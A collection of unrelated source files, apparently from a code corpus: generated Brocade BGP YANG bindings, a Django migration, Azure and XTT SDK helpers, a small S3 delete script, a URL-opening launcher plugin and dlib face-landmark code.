t = YANGDynClass(v,base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bfd must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_bfd(self):
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_maxas_limit(self):
"""
Getter method for maxas_limit, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maxas_limit (container)
"""
return self.__maxas_limit
def _set_maxas_limit(self, v, load=False):
"""
Setter method for maxas_limit, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maxas_limit (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_maxas_limit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maxas_limit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """maxas_limit must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__maxas_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_maxas_limit(self):
self.__maxas_limit = YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_update_source(self):
"""
Getter method for update_source, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/update_source (container)
"""
return self.__update_source
def _set_update_source(self, v, load=False):
"""
Setter method for update_source, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/update_source (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_update_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_update_source() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """update_source must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__update_source = t
if hasattr(self, '_set'):
self._set()
def _unset_update_source(self):
self.__update_source = YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_send_community(self):
"""
Getter method for send_community, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/send_community (container)
"""
return self.__send_community
def _set_send_community(self, v, load=False):
"""
Setter method for send_community, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/send_community (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_send_community is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_send_community() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """send_community must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__send_community = t
if hasattr(self, '_set'):
self._set()
def _unset_send_community(self):
self.__send_community = YANGDynClass(base=send_community.send_community, is_container='container', presence=False, yang_name="send-community", rest_name="send-community", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Send community attribute to this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_activate(self):
"""
Getter method for activate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/activate (empty)
"""
return self.__activate
def _set_activate(self, v, load=False):
"""
Setter method for activate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/activate (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_activate is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_activate() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """activate must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__activate = t
if hasattr(self, '_set'):
self._set()
def _unset_activate(self):
self.__activate = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="activate", rest_name="activate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow exchange of route in the current family mode', u'cli-run-template': u'$(.?\\r:no neighbor $(../af-ipv4-neighbor-address) activate\n)', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
af_ipv4_neighbor_address = __builtin__.property(_get_af_ipv4_neighbor_address, _set_af_ipv4_neighbor_address)
remote_as = __builtin__.property(_get_remote_as, _set_remote_as)
shutdown = __builtin__.property(_get_shutdown, _set_shutdown)
af_vrf_neighbor_capability = __builtin__.property(_get_af_vrf_neighbor_capability, _set_af_vrf_neighbor_capability)
allowas_in = __builtin__.property(_get_allowas_in, _set_allowas_in)
filter_list = __builtin__.property(_get_filter_list, _set_filter_list)
maximum_prefix = __builtin__.property(_get_maximum_prefix, _set_maximum_prefix)
default_originate = __builtin__.property(_get_default_originate, _set_default_originate)
prefix_list = __builtin__.property(_get_prefix_list, _set_prefix_list)
neighbor_route_map = __builtin__.property(_get_neighbor_route_map, _set_neighbor_route_map)
route_reflector_client = __builtin__.property(_get_route_reflector_client, _set_route_reflector_client)
unsuppress_map = __builtin__.property(_get_unsuppress_map, _set_unsuppress_map)
af_nei_weight = __builtin__.property(_get_af_nei_weight, _set_af_nei_weight)
enable_peer_as_check = __builtin__.property(_get_enable_peer_as_check, _set_enable_peer_as_check)
additional_paths = __builtin__.property(_get_additional_paths, _set_additional_paths)
associate_peer_group = __builtin__.property(_get_associate_peer_group, _set_associate_peer_group)
description = __builtin__.property(_get_description, _set_description)
local_as = __builtin__.property(_get_local_as, _set_local_as)
next_hop_self = __builtin__.property(_get_next_hop_self, _set_next_hop_self)
advertisement_interval = __builtin__.property(_get_advertisement_interval, _set_advertisement_interval)
ebgp_btsh = __builtin__.property(_get_ebgp_btsh, _set_ebgp_btsh)
ebgp_multihop = __builtin__.property(_get_ebgp_multihop, _set_ebgp_multihop)
password = __builtin__.property(_get_password, _set_password)
enforce_first_as = __builtin__.property(_get_enforce_first_as, _set_enforce_first_as)
timers = __builtin__.property(_get_timers, _set_timers)
remove_private_as = __builtin__.property(_get_remove_private_as, _set_remove_private_as)
as_override = __builtin__.property(_get_as_override, _set_as_override)
soft_reconfiguration = __builtin__.property(_get_soft_reconfiguration, _set_soft_reconfiguration)
static_network_edge = __builtin__.property(_get_static_network_edge, _set_static_network_edge)
bfd = __builtin__.property(_get_bfd, _set_bfd)
maxas_limit = __builtin__.property(_get_maxas_limit, _set_maxas_limit)
update_source = __builtin__.property(_get_update_source, _set_update_source)
send_community = __builtin__.property(_get_send_community, _set_send_community)
activate = __builtin__.property(_get_activate, _set_activate)
_pyangbind_elements = {'af_ipv4_neighbor_address': af_ipv4_neighbor_address, 'remote_as': remote_as, 'shutdown': shutdown, 'af_vrf_neighbor_capability': af_vrf_neighbor_capability, 'allowas_in': allowas_in, 'filter_list': filter_list, 'maximum_prefix': maximum_prefix, 'default_originate': default_originate, 'prefix_list': prefix_list, 'neighbor_route_map': neighbor_route_map, 'route_reflector_client': route_reflector_client, 'unsuppress_map': unsuppress_map, 'af_nei_weight': af_nei_weight, 'enable_peer_as_check': enable_peer_as_check, 'additional_paths': additional_paths, 'associate_peer_group': associate_peer_group, 'description': description, 'local_as': local_as, 'next_hop_self': next_hop_self, 'advertisement_interval': advertisement_interval, 'ebgp_btsh': ebgp_btsh, 'ebgp_multihop': ebgp_multihop, 'password': password, 'enforce_first_as': enforce_first_as, 'timers': timers, 'remove_private_as': remove_private_as, 'as_override': as_override, 'soft_reconfiguration': soft_reconfiguration, 'static_network_edge': static_network_edge, 'bfd': bfd, 'maxas_limit': maxas_limit, 'update_source': update_source, 'send_community': send_community, 'activate': activate, }
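# Illustrative usage sketch (comments only; an assumption, not part of the generated
# module): pyangbind exposes every YANG node above as a plain Python property, so a
# hypothetical instance `n` of this neighbor-address class could be driven like:
#   n.remote_as = 65001        # leaf values are validated through YANGDynClass on assignment
#   n.activate = True          # 'empty' leaves are toggled with a boolean
#   n.timers.keepalive = 30    # containers return nested generated classes (child names assumed)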
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
243dcf4cbd787542b8035f70084f4f0edc16909f
|
57b34673b9b9089a14b516f122085c86f54b5905
|
/crepes_bretonnes/blog/migrations/0001_initial.py
|
aecd577eb3ffc3028faaf9012a20b48dd9238428
|
[] |
no_license
|
AnthonyCamelCase/CrepesDjango
|
83b801fbbf7ab6fdf6a538bd18b66f6c475a6ba2
|
2f8622ed766e6d6a601a330cd0eaea61b75322ea
|
refs/heads/master
| 2022-11-17T17:13:13.064851
| 2020-07-17T15:07:41
| 2020-07-17T15:07:41
| 280,087,669
| 0
| 1
| null | 2020-07-17T15:07:43
| 2020-07-16T07:41:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
# Generated by Django 3.0.8 on 2020-07-16 12:48
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Categorie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nom', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titre', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('auteur', models.CharField(max_length=42)),
('contenu', models.TextField(null=True)),
('date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Date de parution')),
('categorie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Categorie')),
],
options={
'ordering': ['date'],
},
),
]
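# A minimal models.py sketch (an assumption, kept commented out so it cannot affect the
# migration when Django imports this file) of the model definitions this initial
# migration corresponds to; field names come from the operations above:
#
#   from django.db import models
#   from django.utils import timezone
#
#   class Categorie(models.Model):
#       nom = models.CharField(max_length=30)
#
#   class Article(models.Model):
#       titre = models.CharField(max_length=100)
#       slug = models.SlugField(max_length=100)
#       auteur = models.CharField(max_length=42)
#       contenu = models.TextField(null=True)
#       date = models.DateTimeField(default=timezone.now, verbose_name='Date de parution')
#       categorie = models.ForeignKey('Categorie', on_delete=models.CASCADE)
#
#       class Meta:
#           ordering = ['date']
#
# The migration itself is applied with the standard command: python manage.py migrate blog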
|
[
"a.dottesi@hotmail.fr"
] |
a.dottesi@hotmail.fr
|
6e8bab13b0bf9b431be3409f57efa615ab2d6522
|
64017b09b175d6298a0c873507c011fca66d564d
|
/FDApy/src/__init__.py
|
6f6e4d71c4848b73a70c0ceac3af3baf7b90dba7
|
[
"MIT"
] |
permissive
|
mattjtodd/FDApy
|
844d84529088ec3056b05150124a37bc1b420a1f
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
refs/heads/master
| 2023-07-11T10:53:40.556226
| 2021-08-20T15:59:16
| 2021-08-20T15:59:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 58
|
py
|
"""
C++ code module.
This module contains C++ code.
"""
|
[
"steven_golovkine@icloud.com"
] |
steven_golovkine@icloud.com
|
cdd849bf42e0aabdc0b93f35e38e325cdaeeef3b
|
3d94eaf21d3342f6ff7febe45e37436016f551e0
|
/while.py
|
0cc642da98c6cf47734c7cd806017670df6bd283
|
[] |
no_license
|
JihyeCha/college
|
a6402b60b2afd6f8c5a67bd8175b7052abee94d0
|
5c81d897e636c999a8a6fe95d4c4cf7e18b908ae
|
refs/heads/main
| 2023-05-23T00:19:03.453613
| 2021-06-15T07:07:14
| 2021-06-15T07:07:14
| 364,822,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
i = 0
while i in range(3):  # runs while i is 0, 1 or 2
    print(i)
    print("영희 : 안녕 철수야 뭐해?")  # Younghee: Hi Cheolsu, what are you up to?
    print("철수 : 안녕 영희야 숨만 쉬고 있어")  # Cheolsu: Hi Younghee, just breathing
    i += 1  # advance the counter; without this the loop never terminates
    if i == 1:
        continue  # skip Jungsu's line on this pass
    print("정수 : 안녕 얘들아")  # Jungsu: Hi everyone
|
[
"noreply@github.com"
] |
JihyeCha.noreply@github.com
|
8c66a4f48a392bc2a7c364f19d1d33c46219c529
|
9a7c7d5b81e362f49366dfba963640867ca6f6db
|
/venv/Scripts/easy_install-script.py
|
86e017dad94e0e1958cba0ffa08cc41144ae6aa8
|
[] |
no_license
|
Dark-C-oder/session8
|
56d204a8c44efba9b24c9c32b4957f04b2acc7c6
|
5bdb06f17656032ca6f6d44dfee0bafe819bf896
|
refs/heads/master
| 2020-06-03T08:40:15.765287
| 2019-06-12T06:38:53
| 2019-06-12T06:38:53
| 191,512,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 448
|
py
|
#!C:\Users\HP\PycharmProjects\session8\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"rsharma240599@gmail.com"
] |
rsharma240599@gmail.com
|
c3a74fe27402ee5264201ea0910384cec6a1bcf2
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/hour_details_fragment_py3.py
|
afa962a3c628fb781b542e76a7e5ec1c067cd00b
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 918
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class HourDetailsFragment(Model):
"""Properties of an hourly schedule.
:param minute: Minutes of the hour the schedule will run.
:type minute: int
"""
_attribute_map = {
'minute': {'key': 'minute', 'type': 'int'},
}
def __init__(self, *, minute: int=None, **kwargs) -> None:
super(HourDetailsFragment, self).__init__(**kwargs)
self.minute = minute
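# Illustrative usage sketch (an assumption, not part of the generated SDK file), guarded
# so it only runs when this module is executed directly:
if __name__ == '__main__':
    # Schedule fragment for minute 30 of every hour, round-tripped through msrest helpers.
    fragment = HourDetailsFragment(minute=30)
    print(fragment.minute)     # 30
    print(fragment.as_dict())  # a plain dict such as {'minute': 30}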
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
208c52c383c9088b8689673876d6a989678f6664
|
13ff15f5a60b7616fe5610d0b4908f5bc524e931
|
/xtt/_ffi_utils.py
|
0f8e62bc35a4526c2e788468fb05f50960dea01c
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
xaptum/xtt-python
|
f79a5632953c7e3a0c07e84c898705670a4f73ff
|
23ee469488d710d730314bec1136c4dd7ac2cd5c
|
refs/heads/master
| 2020-03-16T13:09:48.832397
| 2018-11-13T18:47:59
| 2018-11-13T19:31:47
| 132,682,741
| 0
| 2
|
Apache-2.0
| 2018-11-13T19:31:48
| 2018-05-09T01:05:22
|
Python
|
UTF-8
|
Python
| false
| false
| 3,911
|
py
|
# Copyright 2018 Xaptum, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from __future__ import absolute_import
from __future__ import print_function
import six
import sys
from xtt._ffi import ffi as _ffi
from xtt._ffi import lib as _lib
from xtt._utils import to_bytes, to_text, _check_len
class _DataStructMetaclass(type):
"""
Adds a :sizeof: class member containing the size in bytes of the
native struct.
"""
def __call__(cls, *args, **kwargs):
if not hasattr(cls, 'struct'):
raise ValueError("Child class must define 'struct'")
cls.sizeof = _ffi.sizeof(cls.struct)
return type.__call__(cls, *args, **kwargs)
@six.add_metaclass(_DataStructMetaclass)
class DataStruct(object):
"""
Many XTT structs are wrappers for a single char[] named data. This
    base class holds a native struct and provides access to the
underlying data array.
Child classes must set the `struct` class member to specify
the struct to wrap.
"""
__metaclass__ = _DataStructMetaclass
@classmethod
def from_file(cls, filename):
with open(filename, 'rb') as f:
raw = f.read()
return cls(raw)
def __init__(self, value=None):
self.native = _ffi.new('%s*'%self.struct)
if self.native == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
if value:
self.data = value
def __repr__(self):
return "%s(%s)"%(type(self).__name__, repr(self.data))
def __str__(self):
return str(self.data)
@property
def data(self):
return _ffi.buffer(self.native.data)[:]
@data.setter
def data(self, value):
_check_len(self.native.data, value)
_ffi.memmove(self.native.data, value, len(value))
class Buffer(object):
"""
Owns and allocates an underlying C unsigned char buffer.
"""
def __init__(self, size):
self.size = size
self.native = _ffi.new('unsigned char[]', self.size)
if self.native == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
class BufferView(object):
"""
A view of an existing underlying C unsigned char buffer.
The view is defined by two parameters, an unsigned char
pointer and a size. These may be set directly or pointers
to them may be passed as outputs to C functions.
This class is designed to work with the :io_bytes_requested:
and :io_ptr: parameters of the XTT C functions.
"""
def __init__(self):
self._size = _ffi.new('uint16_t[1]')
self._data = _ffi.new('unsigned char *[1]')
if self._size == _ffi.NULL or self._data == _ffi.NULL:
raise MemoryError("Unable to allocate native object")
@property
def buffer(self):
"""
A Python buffer representing the underlying memory.
The buffer may be passed to IO functions like this:
`view.buffer = socket.recv(len(view.buffer))`
"""
return _ffi.buffer(self._data[0], self._size[0])
@property
def addressof_size(self):
return _ffi.addressof(self._size)[0]
@property
def addressof_data(self):
return _ffi.addressof(self._data)[0]
@property
def size(self):
return self._size[0]
@property
def data(self):
return self._data[0]
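# Illustrative sketch (an assumption: 'xtt_example_identity' is a hypothetical struct
# name, not taken from the real XTT headers) of how a concrete wrapper sets the `struct`
# member that DataStruct requires:
class _ExampleIdentity(DataStruct):
    """Hypothetical wrapper; real subclasses name an actual struct from xtt._ffi."""
    struct = 'xtt_example_identity'
# Instantiation is left commented out because it would require the named struct to exist
# in the compiled xtt._ffi module:
#   ident = _ExampleIdentity(b'\x00' * 16)
#   print(ident.data)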
|
[
"david.bild@xaptum.com"
] |
david.bild@xaptum.com
|
559697093aa7adb1df388f4314ff5db31f9ec2bf
|
d88292262daa5bf74c4ba445ec6376db16ae754c
|
/DeleteFile.py
|
013994fa9577819fd43aad90d6ac88073f34e33b
|
[] |
no_license
|
ishswar/aws-s3Repo-usingBoto3
|
e46d9abb2c86a6db1f5ae96a93573b465824d9a8
|
7a8046d46ddf4be83b77fa1d17f0f91545a73f72
|
refs/heads/master
| 2020-07-22T10:53:21.470111
| 2019-09-09T21:04:35
| 2019-09-09T21:04:35
| 207,174,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
#!/usr/bin/env python3
import re
import sys
import s3repo
from s3repo.s3repomain import *
s3repo = s3RepoMain()
logger = logger_setup.logger
logger.name = "s3repo.deleteFile"
logger.setLevel(logging.DEBUG)
def usage():
programName = os.path.basename(sys.argv[0])
logger.info(programName + " <username> <userpassword> file-key")
if len(sys.argv) != 4:
programName = os.path.basename(sys.argv[0])
    logger.error("Expected 4 arguments, got [" + str(len(sys.argv)) + "] - re-run program with correct arguments")
usage()
sys.exit(-1)
logger.info(
"About to delete file for user with this info \n\r Username: [" + sys.argv[1] + "] \r\n password: [******]" +
"\n\r file-key: [" + sys.argv[3] + "]")
s3repo.deleteFile(bucket_name=sys.argv[1], user_password=sys.argv[2], user_Key=sys.argv[3])
|
[
"pshah@tibco.com"
] |
pshah@tibco.com
|
f48169e17d0936951759a1348bbd610d915be750
|
adb8c88a0d1a076565014f2eaafe35f8a4965c5e
|
/plugin.py
|
b58ea3def05570d7d29252a87d0ae301620fa9f3
|
[] |
no_license
|
viktorkelemen/SpotBunny
|
2eccae05e8d13160827b302535a78bd1b6d02cb0
|
356818a2128020e152da759d4e24d5623b5626ad
|
refs/heads/master
| 2021-01-01T05:36:37.608596
| 2015-05-17T21:13:40
| 2015-05-17T21:35:53
| 35,783,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
import urllib
def results(fields, original_query):
q = fields.get('~query')
url = u"https://our.intern.facebook.com/intern/bunny/?" + urllib.urlencode([('q', q)])
return {
"title": "Open spotbunny {}".format(q),
"run_args": [url]
}
def run(url):
import os, pipes
os.system('open {0}'.format(pipes.quote(url.encode('utf8'))))
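# Illustrative sketch (an assumption, not part of the original plugin), guarded so it
# only runs when the file is executed directly; it feeds the hooks the kind of fields
# dict the launcher would normally supply:
if __name__ == '__main__':
    demo = results({'~query': 'T12345'}, 'bunny T12345')
    print(demo['title'])        # "Open spotbunny T12345"
    print(demo['run_args'][0])  # the intern bunny URL that run() would open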
|
[
"kelemen.viktor@gmail.com"
] |
kelemen.viktor@gmail.com
|
5aa242f700ec5a467cdc7d012a2345b5d62d513d
|
82ebee7de7c8aaa4343c1b047e8dec0b59f58093
|
/src/face/landmarks.py
|
b1e712a5923bc01928a4bb025efd49b791c2e3ab
|
[] |
no_license
|
bdach/biometric-recognition
|
2b65bcc1b0d278fc01153ffcdc41d27a85cae160
|
eb7f9ec6a728b90cfbce36cce47176a2506898f1
|
refs/heads/master
| 2020-04-24T15:42:08.490240
| 2019-05-12T11:14:44
| 2019-05-12T11:14:44
| 172,078,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,328
|
py
|
import dlib
import numpy as np
class LandmarkNormalizer:
result_length = 136
@staticmethod
def compute_face_descriptor(image, landmarks):
xs = np.array([point.x for point in landmarks.parts()])
ys = np.array([point.y for point in landmarks.parts()])
# point no. 36 is left corner of left eyelid
# point no. 45 is right corner of right eyelid
slope_x = (ys[45] - ys[36]) / (xs[45] - xs[36])
# point no. 27 is top of nose ridge
# point no. 33 is bottom of nose ridge
slope_y = (xs[33] - xs[27]) / (ys[33] - ys[27])
xs_skewed = xs - slope_y * ys
ys_skewed = ys - slope_x * xs
width = xs_skewed.max() - xs_skewed.min()
height = ys_skewed.max() - ys_skewed.min()
xs_scaled = (xs_skewed - xs_skewed.min()) / width - 0.5
# Y axis inverted for human purposes only - shouldn't matter in practice
ys_scaled = -(ys_skewed - ys_skewed.min()) / height + 0.5
return np.concatenate((xs_scaled, ys_scaled))
class DlibFaceRecognitionModel:
result_length = 128
def __init__(self, model_file=''):
self.model = dlib.face_recognition_model_v1(model_file)
def compute_face_descriptor(self, image, landmarks):
return self.model.compute_face_descriptor(image, landmarks)
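# Illustrative usage sketch (assumptions: 'face.jpg' and the standard dlib 68-point
# predictor file are placeholders, not part of the original module), guarded so it only
# runs when executed directly:
if __name__ == '__main__':
    detector = dlib.get_frontal_face_detector()
    predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')
    image = dlib.load_rgb_image('face.jpg')
    for rect in detector(image, 1):
        landmarks = predictor(image, rect)
        descriptor = LandmarkNormalizer.compute_face_descriptor(image, landmarks)
        print(descriptor.shape)  # (136,) = LandmarkNormalizer.result_length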
|
[
"dach.bartlomiej@gmail.com"
